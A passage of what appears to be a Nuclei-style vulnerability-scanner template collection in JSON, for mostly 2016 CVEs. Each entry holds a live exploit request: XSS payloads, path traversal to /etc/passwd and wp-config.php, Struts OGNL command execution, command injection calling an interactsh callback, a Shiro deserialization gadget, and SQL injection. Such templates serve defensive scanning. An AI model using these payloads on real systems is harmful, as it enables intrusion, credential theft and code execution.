Indexisto"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WPSOLR Search Engine ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Page Layout Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Forget About Shortcode Buttons ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/scoreme/style"]}]},{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["New Year Firework ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WHIZZ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-Parsi Admin Font Editor","MW Font Changer"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Defa Online Image Protector"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["anti plagiarism","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ajax Random Post"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Tidio Gallery","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Admin Font Editor"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simpel Reserveren","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5674","info":{"name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id","{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, 'Debugging Center')","regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'Debugging Center')","contains(body_2, 'Windows IP')"],"condition":"and"}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["CM Tooltip Glossary"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/pondol-formmail/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Easy Contact Form Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/heat-trackr/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Hero Maps Pro ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30013","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: 